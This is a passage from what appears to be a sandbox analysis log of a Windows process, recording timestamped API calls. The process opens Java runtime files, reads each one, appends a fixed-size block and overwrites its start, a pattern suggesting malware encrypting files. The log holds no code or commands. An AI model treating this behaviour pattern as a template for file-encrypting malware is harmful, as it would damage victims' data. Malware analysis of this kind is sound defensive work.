lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0119.247] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.247] ReleaseMutex (hMutex=0x168) returned 1 [0119.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.exe", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0119.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chrome.exe", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chrome.exe", lpUsedDefaultChar=0x0) returned 10 [0119.247] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0119.251] ReadFile (in: hFile=0x1fc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.252] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x116358 [0119.252] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.255] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x116358 [0119.255] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0119.255] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0119.255] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0119.256] WriteFile (in: hFile=0x1fc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0119.256] CloseHandle (hObject=0x1fc) returned 1 [0119.257] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\javaw.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaw.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0119.257] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0119.258] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2aba8 [0119.258] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0119.258] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0119.258] ReleaseMutex (hMutex=0x168) returned 1 [0119.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0119.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="javaw.exe", cchWideChar=9, lpMultiByteStr=0x1f735ec, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="javaw.exe", lpUsedDefaultChar=0x0) returned 9 [0119.258] ReadFile (in: hFile=0x1fc, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0119.259] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x29ba8 [0119.259] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0119.684] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x29ba8 [0119.685] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0124.184] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0124.184] WriteFile (in: hFile=0x1fc, lpBuffer=0x289f978*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f978*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0124.184] CloseHandle (hObject=0x1fc) returned 1 [0124.186] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\orbd.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\orbd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.384] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.385] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3da8 [0127.488] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.488] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.488] ReleaseMutex (hMutex=0x168) returned 1 [0127.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0127.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="orbd.exe", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="orbd.exe", lpUsedDefaultChar=0x0) returned 8 [0127.488] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.496] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2da8 [0127.496] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.503] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2da8 [0127.503] WriteFile (in: hFile=0x1d4, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.504] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0127.504] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0127.504] CloseHandle (hObject=0x1d4) returned 1 [0127.504] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack200.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0127.507] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.507] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x23ba8 [0127.507] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.507] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.507] ReleaseMutex (hMutex=0x168) returned 1 [0127.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0127.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unpack200.exe", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unpack200.exe", lpUsedDefaultChar=0x0) returned 13 [0127.507] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0127.509] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x22ba8 [0127.510] ReadFile (in: hFile=0x204, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.511] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x22ba8 [0127.511] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.586] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0127.586] WriteFile (in: hFile=0x204, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0127.587] CloseHandle (hObject=0x204) returned 1 [0127.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.596] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.596] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x278 [0127.596] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.596] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.596] ReleaseMutex (hMutex=0x168) returned 1 [0127.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0127.596] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRAY.pf", cchWideChar=7, lpMultiByteStr=0x1f7acb4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRAY.pf", lpUsedDefaultChar=0x0) returned 7 [0127.596] ReadFile (in: hFile=0x1d4, lpBuffer=0x1e943c8, nNumberOfBytesToRead=0x278, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943c8*, lpNumberOfBytesRead=0x2e9f2bc*=0x278, lpOverlapped=0x0) returned 1 [0127.597] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0127.598] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x800, lpOverlapped=0x0) returned 1 [0127.598] CloseHandle (hObject=0x1d4) returned 1 [0127.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.599] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.599] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xb2c [0127.599] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.599] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.599] ReleaseMutex (hMutex=0x168) returned 1 [0127.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0127.599] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.properties", cchWideChar=19, lpMultiByteStr=0x1f8867c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.properties", lpUsedDefaultChar=0x0) returned 19 [0127.599] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xb2c, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xb2c, lpOverlapped=0x0) returned 1 [0127.602] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0127.603] WriteFile (in: hFile=0x1d4, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x10b4, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f2d0*=0x10b4, lpOverlapped=0x0) returned 1 [0127.603] CloseHandle (hObject=0x1d4) returned 1 [0127.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.604] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.604] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xd51 [0127.604] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.604] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.604] ReleaseMutex (hMutex=0x168) returned 1 [0127.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0127.604] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_sv.properties", cchWideChar=22, lpMultiByteStr=0x1f88ba4, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_sv.properties", lpUsedDefaultChar=0x0) returned 22 [0127.604] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xd51, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xd51, lpOverlapped=0x0) returned 1 [0127.607] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0127.607] WriteFile (in: hFile=0x1d4, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x12d9, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f2d0*=0x12d9, lpOverlapped=0x0) returned 1 [0127.607] CloseHandle (hObject=0x1d4) returned 1 [0127.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.609] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.609] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xaa4a [0127.609] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.609] ReleaseMutex (hMutex=0x168) returned 1 [0127.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0127.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x1f7358c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jaccess.jar", lpUsedDefaultChar=0x0) returned 11 [0127.609] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0127.612] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9a4a [0127.612] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0127.613] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x9a4a [0127.613] WriteFile (in: hFile=0x1d4, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0127.613] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0127.613] WriteFile (in: hFile=0x1d4, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0127.614] CloseHandle (hObject=0x1d4) returned 1 [0127.614] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0127.615] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.615] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xf58 [0127.615] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0127.615] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0127.615] ReleaseMutex (hMutex=0x168) returned 1 [0127.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0127.615] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="flavormap.properties", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flavormap.properties", lpUsedDefaultChar=0x0) returned 20 [0127.615] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xf58, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f2bc*=0xf58, lpOverlapped=0x0) returned 1 [0128.326] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0128.326] WriteFile (in: hFile=0x1d4, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, 